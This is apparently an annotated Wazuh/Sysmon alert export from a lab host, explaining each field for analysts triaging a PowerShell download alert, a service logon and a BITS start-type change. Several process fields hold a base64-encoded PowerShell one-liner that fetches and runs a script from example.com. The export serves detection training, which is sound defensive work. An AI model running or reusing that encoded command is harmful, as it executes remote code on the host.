data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:27.432 ProcessGuid: {94294ddc-c19b-680a-fa0c-000000000e00} ProcessId: 13544 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c198-680a-f80c-000000000e00} ParentProcessId: 14476 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:27.432
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c19b-680a-fa0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13544
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c198-680a-f80c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  14476
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:31.185+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:31.185+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  133
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535391.2846443
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:28.9848322Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350806
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:28.934 ProcessGuid: {94294ddc-c19b-680a-fa0c-000000000e00} ProcessId: 13544 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_jugljtfi.vxn.ps1 CreationUtcTime: 2025-04-24 22:56:28.934 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:28.934
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c19b-680a-fa0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13544
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jugljtfi.vxn.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:28.934
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:56:31.816+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:31.816+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  68
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535391.2849212
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:29.1998112Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  44009
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  888
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
Rendered text of Security event 4624 (successful logon). What matters here: Logon Type 5 (service), new logon SYSTEM requested by services.exe, no source address. That is the Service Control Manager starting a service under LocalSystem, which every Windows host does constantly. It becomes interesting only when you can pair it with a 7045 (new service installed) or 7040 (start type changed) in the System log at the same moment, or when a type 5 logon is requested by anything other than services.exe.

data.win.eventdata.subjectUserSid:  S-1-5-18
SID of the account that requested the logon. S-1-5-18 is the well-known SID of Local System (NT AUTHORITY\SYSTEM).

data.win.eventdata.subjectUserName:  ATTACKER$
Account name of the requester. ATTACKER$ is the computer account of host Attacker (machine accounts end in $); SYSTEM shows up under it.

data.win.eventdata.subjectDomainName:  WORKGROUP
Domain of the requester. WORKGROUP means the host is not domain-joined, so there is no AD object to pivot to.

data.win.eventdata.subjectLogonId:  0x3e7
Logon session that requested the new logon. 0x3E7 (999) is the fixed ID of the SYSTEM session; it is the same on every host and across reboots.

data.win.eventdata.targetUserSid:  S-1-5-18
SID of the account that was logged on. Same well-known SID: SYSTEM creating a session for SYSTEM.

data.win.eventdata.targetUserName:  SYSTEM
Account the new session was created for.

data.win.eventdata.targetDomainName:  NT AUTHORITY
Pseudo-domain of the built-in SYSTEM account, not a real domain.

data.win.eventdata.targetLogonId:  0x3e7
Logon ID of the new session. Equal to the SYSTEM session ID, so services started as LocalSystem keep running under 0x3E7; later events from the service carry this value.

data.win.eventdata.logonType:  5
Logon type. 5 = Service (started by the Service Control Manager). Others you will meet: 2 interactive, 3 network (SMB, WinRM), 4 batch/scheduled task, 7 unlock, 9 NewCredentials (runas /netonly), 10 RemoteInteractive (RDP), 11 cached interactive.

data.win.eventdata.logonProcessName:  Advapi
Logon process that asked LSA for the session. Advapi = the LogonUser API, used by services.exe for service logons. Interactive logons show User32; network logons show Kerberos or NtLmSsp.

data.win.eventdata.authenticationPackageName:  Negotiate
Security package. Negotiate picks Kerberos when it can and NTLM otherwise; on a workgroup host that means NTLM or a purely local logon. The 'Package Name (NTLM only)' field in the message says which was actually used.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
Correlates this logon with the Kerberos ticket events (4768/4769) on the KDC. All zeros = no Kerberos ticket, as expected for a local service logon.

data.win.eventdata.keyLength:  0
Length in bits of the session key generated for this logon. 0 means none was requested, normal for local, service and Kerberos logons. For NTLM network logons expect 128; a smaller value (40 or 56) points at a downgraded session worth a look.

data.win.eventdata.processId:  0x304
PID (hex) of the process that requested the logon. 0x304 = 772, the services.exe named in the next field.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
Image of the requesting process. services.exe is the Service Control Manager, the expected requester of type 5 logons. A type 5 logon requested by any other image is a red flag.

data.win.eventdata.impersonationLevel:  %%1833
Message-table placeholder; the rendered message shows it as Impersonation. The session can impersonate the account on this machine but cannot authenticate to remote systems with it.

data.win.eventdata.virtualAccount:  %%1843
Placeholder rendered as No in the message: a real account, not a per-service virtual account (NT SERVICE\name).

data.win.eventdata.targetLinkedLogonId:  0x0
ID of the paired session when UAC splits a logon into an elevated and a filtered token. 0x0 = no linked session, as expected for SYSTEM.

data.win.eventdata.elevatedToken:  %%1842
Placeholder rendered as Yes in the message: the new token carries full administrative rights, which SYSTEM always does.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Service startup type was changed

🧠 What happened? Service startup type was changed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:56:32.001+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:32.001+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Service startup type was changed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61104
Numeric ID of the detection rule that fired.

rule.info:  This does not appear to be logged on Windows 2000
Free-text note stored in the Wazuh rule definition, here only a compatibility remark about the event source.

rule.firedtimes:  12
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'policy_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535392.2856547
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
ETW provider that wrote the event. Service Control Manager emits the service lifecycle events: 7034 unexpected stop, 7036 start/stop, 7040 start type changed, 7045 new service installed.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
Fixed GUID of that provider; use it in filters that must survive a provider rename.

data.win.system.eventSourceName:  Service Control Manager
Legacy (pre-ETW) source name; identical to the provider here.

data.win.system.eventID:  7040
Windows Event ID. 7040 = a service's start type was changed, whether by sc config, Set-Service, a registry edit under HKLM\SYSTEM\CurrentControlSet\Services, or the service itself.

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
Event level: 1 critical, 2 error, 3 warning, 4 information, 5 verbose. 4 here, so Windows itself regards the change as routine.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:29.3906500Z
When the Windows event log wrote the record (UTC). Compare with timestamp above, the Wazuh manager's ingest time: a gap of a few seconds is normal, minutes means forwarding lag.

data.win.system.eventRecordID:  3076
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
PID of the process that wrote the event. 772 is services.exe, the same PID that appears as 0x304 in the 4624 alert above.

data.win.system.threadID:  10380
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
Event log that holds the record (System, Security, Application, or a provider channel such as Microsoft-Windows-Sysmon/Operational).

data.win.system.computer:  Attacker
Hostname stamped by Windows. Should match agent.name; a mismatch means forwarded events or a renamed host.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start."
Rendered 7040 text. BITS flipping from demand start to auto start is something Windows does by itself whenever a transfer job is queued (Windows Update, the Store), and it flips back when the queue empties, which is why rule.firedtimes is already 12. The 7040 transitions worth chasing are a security service (Windows Defender, Sysmon, the Wazuh agent, EventLog) changed to disabled, or a service nobody recognises switched to auto start. Do not drop this one entirely: it lands under a second before the encoded PowerShell in the next alert, and BITS is also a classic download and persistence channel (ATT&CK T1197, BITS Jobs), so list the jobs on the host with bitsadmin /list /allusers /verbose or Get-BitsTransfer -AllUsers.

data.win.eventdata.param1:  Background Intelligent Transfer Service
Service display name as shown in services.msc.

data.win.eventdata.param2:  demand start
Previous start type. Windows uses the words boot start, system start, auto start, demand start and disabled here.

data.win.eventdata.param3:  auto start
New start type. Disabled on a security service, or auto start on an unknown service, is the combination to escalate.

data.win.eventdata.param4:  BITS
Service key name (HKLM\SYSTEM\CurrentControlSet\Services\BITS). Use this, not the display name, when pivoting to sc query, sc qc or the registry.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:33.513+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:33.513+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  130
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535393.2858360
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
Event comes from Sysmon, not the built-in Security log, so it carries the hashes, stable GUIDs and parent command line that 4688 lacks.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Sysmon's fixed provider GUID, identical on every host.

data.win.system.eventID:  1
Sysmon Event ID (its own numbering, not the Security log's). 1 = Process Create, the counterpart of Security 4688 with more detail.

data.win.system.version:  5
Schema version of the event; newer Sysmon builds add fields, so not every host will show the same set.

data.win.system.level:  4
Event level: 1 critical, 2 error, 3 warning, 4 information, 5 verbose. Sysmon logs everything at 4; severity comes from the Wazuh rule, not from here.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:31.2111559Z
When the Sysmon channel wrote the record (UTC). Three clocks to keep straight: utcTime in the event data (22:56:30.128, the process was created), systemTime (22:56:31.21, the record was logged) and timestamp (22:56:33.5, the Wazuh manager ingested it). Build the timeline on the first one.

data.win.system.eventRecordID:  350830
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service process that logged the event, not of the new process; the created process's PID is in data.win.eventdata.processId.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Sysmon's own channel. It must be listed as a <localfile> in the agent's ossec.conf, or none of these alerts exist.

data.win.system.computer:  Attacker
Hostname stamped by Windows; should match agent.name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

